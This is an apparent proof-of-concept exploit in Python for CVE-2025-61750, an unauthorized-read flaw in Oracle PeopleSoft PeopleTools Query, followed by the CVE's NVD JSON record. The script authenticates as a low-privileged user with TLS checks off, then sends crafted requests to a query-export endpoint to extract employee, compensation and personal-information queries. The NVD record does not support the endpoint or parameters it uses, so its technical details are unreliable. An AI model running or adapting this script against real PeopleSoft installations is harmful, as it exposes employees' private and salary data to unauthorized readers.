CVE-2025-61750

# CVE-2025-61750 PoC - Oracle PeopleSoft PeopleTools Query Unauthorized Data Access # This PoC demonstrates the unauthorized read access vulnerability in the Query component # Note: Requires valid low-privileged credentials for the PeopleSoft system import requests import urllib3 # Disable SSL warnings (for testing purposes only) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class PeopleSoftQueryExploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', }) def authenticate(self): """Authenticate to PeopleSoft with low-privileged credentials""" login_url = f"{self.target_url}/psc/ps/EMPLOYEE/CRM/c/SIGNON_OPTIONS.SIGNON" # Login payload for PeopleSoft authentication login_data = { 'userid': self.username, 'pwd': self.password, 'ptmode': 'F', 'ptlangcd': 'ENG', 'ptltype': 'P', } try: response = self.session.post(login_url, data=login_data, timeout=30) if response.status_code == 200 and 'PSJSESSIONID' in str(self.session.cookies): print("[+] Authentication successful") return True except Exception as e: print(f"[-] Authentication failed: {e}") return False def exploit_query_component(self, query_name): """ Exploit the Query component to access unauthorized data The vulnerability allows low-privileged users to read data beyond their normal access scope """ # Query component endpoint - vulnerable to unauthorized access query_url = f"{self.target_url}/psc/ps/EMPLOYEE/CRM/c/QRY_EXCEL.QRY_EXCEL.FieldFormula" # Crafted query parameters to bypass access control query_params = { 'ICType': 'Panel', 'ICElementNum': '0', 'ICXPos': '0', 'ICYPos': '0', 'ICResubmit': '0', 'ICForceCollect': '1', 'ICChanged': '-1', 'ICAction': 'QRYEXCEL', 'ICQryName': query_name, 'ICPrompt': 'N', } try: response = self.session.post(query_url, data=query_params, timeout=30) if response.status_code == 200: # Check if unauthorized data was returned if 'RECORDNAME' in response.text or 'FIELDNAME' in response.text: print(f"[+] Query executed - potential unauthorized data access detected") return response.text except Exception as e: print(f"[-] Query execution failed: {e}") return None def run(self): """Main exploit routine""" print(f"[*] Target: {self.target_url}") print(f"[*] CVE-2025-61750 - PeopleSoft Query Unauthorized Read") if not self.authenticate(): print("[-] Failed to authenticate. Valid credentials required.") return # Attempt to query restricted records restricted_queries = [ 'EMPLOYEE_RECORDS', 'COMPENSATION_DATA', 'PERSONAL_INFO', ] for query in restricted_queries: print(f"[*] Attempting query: {query}") result = self.exploit_query_component(query) if result: print(f"[+] Potential data leak from query: {query}") if __name__ == '__main__': # Usage example # exploit = PeopleSoftQueryExploit( # target_url="https://target-peoplesoft.example.com:8000", # username="low_priv_user", # password="password123" # ) # exploit.run() print("CVE-2025-61750 PoC - Configure target and credentials before running")

{"cve": {"id": "CVE-2025-61750", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.340", "lastModified": "2025-10-24T14:36:30.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.61 and 8.62. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.61:*:*:*:*:*:*:*", "matchCriteriaId": "18F15FC6-947A-462A-8329-C52907799A7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.62:*:*:*:*:*:*:*", "matchCriteriaId": "FF0E4EFC-096B-4861-8D55-D8DAA37A21E9"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}